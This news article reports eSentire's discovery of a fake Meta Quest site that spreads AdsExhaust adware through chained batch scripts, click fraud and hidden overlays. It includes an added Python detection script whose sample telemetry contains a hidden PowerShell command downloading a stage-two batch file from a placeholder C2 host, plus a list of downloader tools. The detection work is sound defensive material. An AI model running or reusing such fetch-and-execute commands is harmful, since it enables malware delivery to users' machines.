If you are looking for the Meta Quest app for Windows, be careful: researchers have found a malicious counterfeit version that infects endpoints with adware and steals information.
Researchers from eSentire revealed that they recently observed a fake Meta Quest website at oculus-app(.)com, a site that looks identical to the authentic one and lets visitors download the app, but bundled with malware.
The site ranks well in search engines thanks to various SEO poisoning techniques, the researchers said. As a result, users searching for Meta Quest are likely to land on the malicious site instead. Once they download the app and run the installer, they also get a Windows batch script that retrieves a second batch script from the command-and-control (C2) server, which in turn retrieves a final batch file.
Viewing advertisements
The malware first checks whether Microsoft's Edge browser is running and when the user last interacted with it. Once the endpoint has been idle for nine minutes, the script opens new tabs, navigates to certain URLs, randomly scrolls up and down the page, and injects clicks. All of this generates advertising revenue for the malware's operators.
Additionally, the adware, called AdsExhaust, can take screenshots and simulate keystrokes, the researchers said.
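The two behaviours described above, a staged chain of batch scripts pulled from the C2 server and a browser launched from that chain, leave a recognisable parent/child pattern in process-creation telemetry. As an added example (not code from eSentire or the article), the following Python flags that pattern in constructed, Sysmon-style process records; the field names, file paths and hosts are assumptions and placeholders, not indicators from the campaign.

```python
# Added example: hunt for the staged batch chain over constructed Sysmon-style process records (an assumption).
import re
from collections import defaultdict

DOWNLOADERS = ("powershell.exe", "curl.exe", "bitsadmin.exe", "certutil.exe")

def is_batch_host(ev):
    """cmd.exe launched to execute a .bat/.cmd script."""
    return bool(ev["image"].lower().endswith("cmd.exe") and re.search(r"\.(bat|cmd)\b", ev["cmdline"], re.I))

def fetches_batch(ev):
    """A downloader whose command line pulls a further .bat/.cmd from a URL."""
    return bool(ev["image"].lower().endswith(DOWNLOADERS) and re.search(r"https?://\S+\.(bat|cmd)\b", ev["cmdline"], re.I))

def ancestry(ev, by_pid):
    """Parent chain of ev, oldest first; 'seen' guards against pid-reuse loops."""
    chain, seen, cur = [], set(), ev
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    return chain[::-1]

def find_staging_chains(events, min_batch_hosts=2):
    """pid chains of msedge.exe launches descended from >= min_batch_hosts batch-running
    cmd.exe processes, one of which also spawned a downloader fetching another .bat."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    hits = []
    for e in events:
        if not e["image"].lower().endswith("msedge.exe"):
            continue
        chain = ancestry(e, by_pid)
        hosts = [a for a in chain if is_batch_host(a)]
        fetched = any(fetches_batch(c) for h in hosts for c in children[h["pid"]])
        if len(hosts) >= min_batch_hosts and fetched:
            hits.append([a["pid"] for a in chain])
    return hits

SAMPLE_EVENTS = [  # constructed sample telemetry; hosts and paths are placeholders
    {"pid": 100, "ppid": 1, "image": r"C:\Users\u\Downloads\FakeQuestSetup.exe", "cmdline": "FakeQuestSetup.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r'cmd.exe /c "%TEMP%\stage1.bat"'},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": r"powershell -w hidden iwr http://c2.example.invalid/stage2.bat -OutFile %TEMP%\stage2.bat"},
    {"pid": 103, "ppid": 101, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r'cmd.exe /c "%TEMP%\stage2.bat"'},
    {"pid": 104, "ppid": 103, "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", "cmdline": "msedge.exe --new-tab http://ads.example.invalid/"},
    {"pid": 200, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},  # benign launch
    {"pid": 201, "ppid": 200, "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", "cmdline": "msedge.exe"},
]
```

The benign Edge launch from explorer.exe is not reported, while the installer-to-batch-to-Edge chain is; `min_batch_hosts` can be raised to 3 to match the three-stage chain the report describes exactly.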
“The adware is capable of exfiltrating screenshots from infected devices and communicating with browsers using simulated keystrokes,” eSentire said. “These features allow automatic clicking through of advertisements or browser redirection to specific URLs, thus generating revenue for the adware operators.”
AdsExhaust is also relatively good at hiding, the researchers found. If it detects mouse movement (meaning a user is sitting at the computer), it closes the open browser and creates an overlay to hide its actions.
“AdsExhaust is an adware threat that cleverly manipulates user interactions and conceals its activities to generate illicit revenue,” the researchers concluded. “It includes multiple techniques such as retrieving malicious code from the C2 server, simulating keystrokes, taking screenshots, and creating overlays to remain undetected while performing malicious activities.”
Via The Hacker News